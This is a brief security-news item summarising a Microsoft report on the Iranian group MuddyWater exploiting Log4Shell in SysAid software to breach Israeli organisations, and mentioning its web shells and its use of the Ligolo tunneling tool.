Security News > 2022 > August > Microsoft: Iranian hackers still exploiting Log4j bugs against Israel

Microsoft: Iranian hackers still exploiting Log4j bugs against Israel
2022-08-26 14:31

Hackers continue to exploit the Log4j vulnerability in vulnerable applications, as shown by the Iranian 'MuddyWater' threat actor who was found targeting Israeli organizations using the SysAid software.

The latest MuddyWater hacking campaign outlined in a Microsoft report yesterday constitutes the first example of leveraging vulnerable SysAid applications to breach corporate networks.

MuddyWater previously targeted VMWare instances that carried Log4j flaws to drop web shells, but assuming that these were eventually patched, the threat actors explored alternative options.

The Iranian hackers exploit Log4Shell flaws for initial access, running malicious PowerShell via a specially crafted request sent to vulnerable endpoints and dropping web shells.

Ligolo is an open-source reverse-tunneling tool that the hackers use for securing communications between backdoors and C2 infrastructure.

While Microsoft's report doesn't go into the details of the particular tool, we know from a March 2022 report by Security Joes that the hackers added useful features like execution checks and command-line parameters.


News URL

https://www.bleepingcomputer.com/news/security/microsoft-iranian-hackers-still-exploiting-log4j-bugs-against-israel/